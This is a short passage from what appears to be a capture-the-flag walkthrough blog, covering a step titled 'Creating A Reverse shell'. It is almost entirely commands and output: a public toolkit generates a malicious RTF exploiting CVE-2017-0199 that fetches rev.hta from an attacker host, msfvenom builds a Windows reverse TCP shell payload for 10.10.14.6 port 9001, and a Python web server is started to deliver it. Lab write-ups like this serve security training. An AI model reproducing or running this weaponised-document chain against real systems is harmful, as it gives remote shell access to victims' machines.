CTFLover hack stuff | CTF solutions

15-Creating A Reverse shell

https://github.com/bhdresh/CVE-2017-0199

 exploit python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w hey.rtf -u http://10.10.14.6/rev.hta 
Generating normal RTF payload.

Generated hey.rtf successfully
➜  exploit ls
CVE-2017-0199  hey.rtf

Now we need a reverse shell as rev.exe, we ll create it with msfvenom.

➜  exploit msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f hta-psh -o rev.hta

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7363 bytes
Saved as: rev.hta

We need a python3 server on port 80

➜  exploit python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...